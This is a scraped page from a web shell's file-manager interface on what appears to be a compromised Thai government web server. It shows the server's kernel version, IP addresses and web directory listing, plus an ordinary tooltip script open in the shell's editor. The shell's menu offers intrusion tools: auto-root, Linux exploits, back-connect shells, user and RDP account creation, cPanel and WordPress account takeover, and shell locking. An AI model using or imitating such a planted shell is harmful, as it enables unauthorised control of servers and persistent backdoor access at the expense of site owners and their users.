Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
plan /
handbook /
[ HOME SHELL ]
Name
Size
Permission
Action
Image11.jpg
40.41
KB
-rwxr-xr-x
Image110.jpg
12.93
KB
-rwxr-xr-x
Image1101.jpg
192.07
KB
-rwxr-xr-x
Image111.jpg
7.66
KB
-rwxr-xr-x
Image112.jpg
6.55
KB
-rwxr-xr-x
Image113.jpg
1.9
KB
-rwxr-xr-x
Image120.jpg
12.54
KB
-rwxr-xr-x
Image130.jpg
12.67
KB
-rwxr-xr-x
Image21.jpg
32.1
KB
-rwxr-xr-x
Image210.jpg
12.22
KB
-rwxr-xr-x
Image2111.jpg
380.12
KB
-rwxr-xr-x
Image2121.jpg
337.5
KB
-rwxr-xr-x
Image2131.jpg
400.57
KB
-rwxr-xr-x
Image220.jpg
11.91
KB
-rwxr-xr-x
Image230.jpg
12.03
KB
-rwxr-xr-x
Image31.jpg
27.57
KB
-rwxr-xr-x
Image310.jpg
10.57
KB
-rwxr-xr-x
Image311.jpg
1.66
KB
-rwxr-xr-x
Image3111.jpg
343.61
KB
-rwxr-xr-x
Image312.jpg
1.77
KB
-rwxr-xr-x
Image3121.jpg
404.15
KB
-rwxr-xr-x
Image320.jpg
10.73
KB
-rwxr-xr-x
Image41.jpg
40.64
KB
-rwxr-xr-x
Image410.jpg
14.2
KB
-rwxr-xr-x
Image411.jpg
1.57
KB
-rwxr-xr-x
Image4111.jpg
315.07
KB
-rwxr-xr-x
Image412.jpg
2.4
KB
-rwxr-xr-x
Image4121.jpg
401.21
KB
-rwxr-xr-x
Image413.jpg
2.21
KB
-rwxr-xr-x
Image4131.jpg
377.27
KB
-rwxr-xr-x
Image414.jpg
2.45
KB
-rwxr-xr-x
Image4141.jpg
400.5
KB
-rwxr-xr-x
Image420.jpg
13.63
KB
-rwxr-xr-x
Image430.jpg
13.93
KB
-rwxr-xr-x
Image440.jpg
14.55
KB
-rwxr-xr-x
Thumbs.db
111
KB
-rwxr-xr-x
handbook1.htm
7.29
KB
-rwxr-xr-x
head1.jpg
6.06
KB
-rwxr-xr-x
jquery-1.3.2.min.js
55.91
KB
-rwxr-xr-x
plan.pdf
458.16
KB
-rwxr-xr-x
stickytooltip.css
1.33
KB
-rwxr-xr-x
stickytooltip.js
3.59
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : stickytooltip.js
/* Sticky Tooltip script (v1.0) * Created: Nov 25th, 2009. This notice must stay intact for usage * Author: Dynamic Drive at http://www.dynamicdrive.com/ * Visit http://www.dynamicdrive.com/ for full source code */ var stickytooltip={ tooltipoffsets: [20, -30], //additional x and y offset from mouse cursor for tooltips fadeinspeed: 200, //duration of fade effect in milliseconds rightclickstick: true, //sticky tooltip when user right clicks over the triggering element (apart from pressing "s" key) ? stickybordercolors: ["black", "darkred"], //border color of tooltip depending on sticky state stickynotice1: ["Press \"s\"", "or right click", "to sticky box"], //customize tooltip status message stickynotice2: "Click outside this box to hide it", //customize tooltip status message //***** NO NEED TO EDIT BEYOND HERE isdocked: false, positiontooltip:function($, $tooltip, e){ var x=e.pageX+this.tooltipoffsets[0], y=e.pageY+this.tooltipoffsets[1] var tipw=$tooltip.outerWidth(), tiph=$tooltip.outerHeight(), x=(x+tipw>$(document).scrollLeft()+$(window).width())? x-tipw-(stickytooltip.tooltipoffsets[0]*2) : x y=(y+tiph>$(document).scrollTop()+$(window).height())? $(document).scrollTop()+$(window).height()-tiph-10 : y $tooltip.css({left:x, top:y}) }, showbox:function($, $tooltip, e){ $tooltip.fadeIn(this.fadeinspeed) this.positiontooltip($, $tooltip, e) }, hidebox:function($, $tooltip){ if (!this.isdocked){ $tooltip.stop(false, true).hide() $tooltip.css({borderColor:'black'}).find('.stickystatus:eq(0)').css({background:this.stickybordercolors[0]}).html(this.stickynotice1) } }, docktooltip:function($, $tooltip, e){ this.isdocked=true $tooltip.css({borderColor:'darkred'}).find('.stickystatus:eq(0)').css({background:this.stickybordercolors[1]}).html(this.stickynotice2) }, init:function(targetselector, tipid){ jQuery(document).ready(function($){ var $targets=$(targetselector) var $tooltip=$('#'+tipid).appendTo(document.body) if ($targets.length==0) return var $alltips=$tooltip.find('div.atip') if (!stickytooltip.rightclickstick) stickytooltip.stickynotice1[1]='' stickytooltip.stickynotice1=stickytooltip.stickynotice1.join(' ') stickytooltip.hidebox($, $tooltip) $targets.bind('mouseenter', function(e){ $alltips.hide().filter('#'+$(this).attr('data-tooltip')).show() stickytooltip.showbox($, $tooltip, e) }) $targets.bind('mouseleave', function(e){ stickytooltip.hidebox($, $tooltip) }) $targets.bind('mousemove', function(e){ if (!stickytooltip.isdocked){ stickytooltip.positiontooltip($, $tooltip, e) } }) $tooltip.bind("mouseenter", function(){ stickytooltip.hidebox($, $tooltip) }) $tooltip.bind("click", function(e){ e.stopPropagation() }) $(this).bind("click", function(e){ if (e.button==0){ stickytooltip.isdocked=false stickytooltip.hidebox($, $tooltip) } }) $(this).bind("contextmenu", function(e){ if (stickytooltip.rightclickstick && $(e.target).parents().andSelf().filter(targetselector).length==1){ //if oncontextmenu over a target element stickytooltip.docktooltip($, $tooltip, e) return false } }) $(this).bind('keypress', function(e){ var keyunicode=e.charCode || e.keyCode if (keyunicode==115){ //if "s" key was pressed stickytooltip.docktooltip($, $tooltip, e) } }) }) //end dom ready } } //stickytooltip.init("targetElementSelector", "tooltipcontainer") stickytooltip.init("*[data-tooltip]", "mystickytooltip")
Close